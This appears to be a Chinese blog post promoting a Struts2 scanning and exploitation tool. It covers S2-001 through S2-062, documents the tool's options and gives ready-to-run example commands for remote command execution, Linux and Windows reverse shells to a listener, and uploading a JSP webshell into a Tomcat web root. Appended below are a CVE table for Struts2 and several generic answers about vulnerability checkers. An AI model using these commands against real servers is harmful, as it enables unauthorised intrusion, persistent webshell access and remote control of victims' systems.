struts2综合漏洞扫描工具

python扫描工具更新2022-4-16

1.添加了S2-062漏洞利用
其实是对S2-061漏洞的绕过
支持命令执行,Linux反弹shell,windows反弹shell。
2.解决了了Windows反弹shell的功能
底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令
不成功的问题。
详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用java命令执行函数反弹windows-shell》

工具地址https://github.com/Vancomycin-g/Struts2Scan/
里面有两个工具,一个是python编写的工具,另一个是jar文件
python工具是改变大佬的。jar文件是在网络上找的。

java工具

优点

1.扫描比较稳定
2.误报情况少,
3.可视化,方便操作

缺点

1.无法指定payload进行利用
2.无法反弹shell
3.无S2-061 payload

用法

直接一键扫描就行了,简单粗暴

python工具

优点

1.大多payload支持Linux反弹shell,少部分payload支持windows反弹shell
2.可以自己选可以使用的payload.
3.有S2-061 payload

缺点

1.稳定性优化的还可以,可能存在误报情况,
2.有许多命令参数。

工具介绍

原作者:github地址:https://github.com/HatBoy/Struts2-Scan
感谢原作者开源的工具
此次是在原有的基础上进行升级,优化。
升级内容:

1.添加了S2-061漏洞
2.优化了误报情况。
3.个别添加了windows反弹shell功能。
4.原来参数-r ip:port修改成了,
-lr ip:port 反弹Linuxshell
-wr ip:port反弹Windows shell
5.还有其他细微的地方

Struts2-Scan

  • Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,S2-061,S2-062
  • 支持单个URL漏洞检测和批量URL检测,指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持

运行环境

工具参数说明

Usage: Struts2Scan.py [OPTIONS]

  Struts2批量扫描利用工具

Options:
  -i, --info          漏洞信息介绍
  -v, --version       显示工具版本
  -u, --url TEXT      URL地址
  -n, --name TEXT     指定漏洞名称, 漏洞名称详见info
  -f, --file TEXT     批量扫描URL文件, 一行一个URL
  -d, --data TEXT     POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  -c, --encode TEXT   页面编码, 默认UTF-8编码
  -p, --proxy TEXT    HTTP代理. 格式为http://ip:port
  -t, --timeout TEXT  HTTP超时时间, 默认10s
  -w, --workers TEXT  批量扫描进程数, 默认为10个进程
  --header TEXT       HTTP请求头, 格式为: key1=value1&key2=value2
  -e, --exec          进入命令执行shell
  --webpath           获取WEB路径
  -lr, --Linux_reverse TEXT  反弹Linux shell地址, 格式为ip:port
  -wr, --Win_reverse TEXT  反弹Windows shell地址, 格式为ip:port
  --upfile TEXT       需要上传的文件路径和名称
  --uppath TEXT       上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
  -q, --quiet         关闭打印不存在漏洞的输出,只保留存在漏洞的输出
  -h, --help          Show this message and exit.

使用例子

查看漏洞详细信息:

$ python3 Struts2Scan.py --info

单个URL漏洞检测:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action

批量漏洞检测:

$ python3 Struts2Scan.py -f urls.txt

指定POST数据:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}

常用方法

# 命令执行
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016  -e



# 反弹Linux shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -lr 192.168.100.8:8888


# 反弹Windows shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -wr 192.168.100.8:8888

# 上传shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp


  • 6
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
Struts2漏洞检查工具2019版 警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! ==漏洞编号==============影响版本=========================官方公告==========================================影响范围===== S2-057 CVE-2018-11776 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 https://cwiki.apache.org/confluence/display/WW/S2-057 影响范围非常小 S2-048 CVE-2017-9791 Struts 2.3.X http://127.0.0.1:8090/struts2-showcase/integration/saveGangster.action 影响范围非常小 S2-046 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-046.html 和S2-045一样 S2-045 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-045.html 影响范围较大 S2-037 CVE-2016-4438 Struts 2.3.20-2.3.28.1 http://struts.apache.org/docs/s2-037.html 影响范围小 S2-032 CVE-2016-3081 Struts 2.3.18-2.3.28 http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小 S2-020 CVE-2014-0094 Struts 2.0.0-2.3.16 http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小 S2-019 CVE-2013-4316 Struts 2.0.0-2.3.15.1 http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般 S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大 S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内 S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内 S2-005 CVE-2010-1870 Struts 2.0.0-2.1.8.1 http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内
### 回答1: struts2是一款流行的Java Web应用程序框架,但由于其复杂性和广泛应用,容易存在安全漏洞。为了确保应用程序的安全性,我们需要使用漏洞检查工具来及时发现和修复漏洞。 2019版的struts2漏洞检查工具通常包括以下功能: 1. 漏洞扫描:该工具可以对struts2应用程序进行全面的漏洞扫描,包括已知漏洞、常见安全配置错误等,确保没有已知的安全漏洞存在。 2. 安全配置评估:该工具可以评估当前应用程序的安全配置情况,包括是否启用了安全性强化功能、是否配置了正确的权限控制等,以确保应用程序配置的安全性。 3. 漏洞修复建议:该工具可以给出针对已发现的漏洞的修复建议,包括修改配置文件、更新框架版本等,以帮助开发人员及时解决安全问题。 4. 实时监控:一些工具提供实时监控功能,能够对运行中的应用程序进行实时检测,及时响应可能的攻击行为。 5. 安全漏洞库更新:漏洞检查工具通常会定期更新安全漏洞库,以跟踪新发现的漏洞和修复方法,确保检查结果的准确性和及时性。 这些工具可以帮助开发人员在应用程序开发和部署过程中识别潜在的安全风险,并提供相应的修复建议。然而,需要注意的是,漏洞检查工具只是安全工作的一部分,还需要结合其他安全措施,如代码审查、安全培训等,来确保应用程序的整体安全性。 ### 回答2: struts2是一款常用的Java Web应用程序开发框架,但由于其一些设计缺陷和安全漏洞,可能导致潜在的安全威胁。因此,研发团队和安全从业人员都需要一个有效的漏洞检查工具来评估和发现可能存在的漏洞。 在2019年,有一些流行的漏洞检查工具可以用于检测struts2框架中的安全漏洞。这些工具通过自动化扫描和分析应用程序的源代码或运行时环境来发现潜在的漏洞。 其中一款被广泛使用的工具是S2-057漏洞检查工具。S2-057是一种struts2框架中的远程代码执行漏洞,可以被攻击者利用来执行任意命令。这款工具通过检查应用程序的配置文件和代码,以及运行时环境的一些指示符,来判断是否存在该漏洞。 另外,还有一些综合性的漏洞检查工具,如SonarQube和OWASP Dependency-Check,也可以用于检查struts2框架的安全漏洞。这些工具不仅可以检测struts2特定的漏洞,还可以扫描应用程序的依赖组件,以发现可能存在的漏洞和安全问题。 综上所述,struts2框架的漏洞检查工具在2019年有多种可选择的选项。无论是针对特定的漏洞还是综合性的安全扫描,开发者和安全从业人员都可以根据自己的需求选择合适的工具来提高应用程序的安全性。当然,定期更新和修复漏洞也是保障应用程序安全的重要措施。 ### 回答3: Struts2是一个非常受欢迎的Java Web应用程序开发框架,但它曾经有过一些安全漏洞,这些漏洞可能导致恶意用户利用该框架执行潜在的远程命令执行、信息泄露或拒绝服务攻击。因此,为了保障应用程序的安全性,需要使用一个强大的漏洞检查工具来发现和修复这些潜在的安全漏洞。 在2019年,我们推荐使用S2-057漏洞检查工具来检测Struts2应用程序中的漏洞。S2-057是Struts2框架的一个高危漏洞,被称为"远程代码执行"漏洞,可使攻击者通过特制的HTTP请求在服务器上执行任意代码。检查工具能够扫描Web应用程序的源代码,查找可能受漏洞影响的部分,并向开发人员提供修复建议。 使用S2-057漏洞检查工具的步骤如下: 1. 下载并安装漏洞检查工具,确保其与您的开发环境兼容。 2. 打开检查工具并导入Struts2 Web应用程序的源代码。 3. 在检查工具界面上,选择运行漏洞检查或扫描。 4. 工具将扫描源代码,查找可能受S2-057漏洞影响的部分。 5. 检查工具将生成报告,列出已发现的漏洞和修复建议。 6. 根据报告中的指导,修复应用程序中的漏洞。 请注意,虽然漏洞检查工具可以帮助发现Struts2应用程序中的潜在安全问题,但并不能保证所有漏洞都能被检测到或修复。因此,我们还建议您保持对Struts2以及其他相关框架的安全更新,并遵循最佳实践来确保应用程序的安全性。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚无-缥缈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值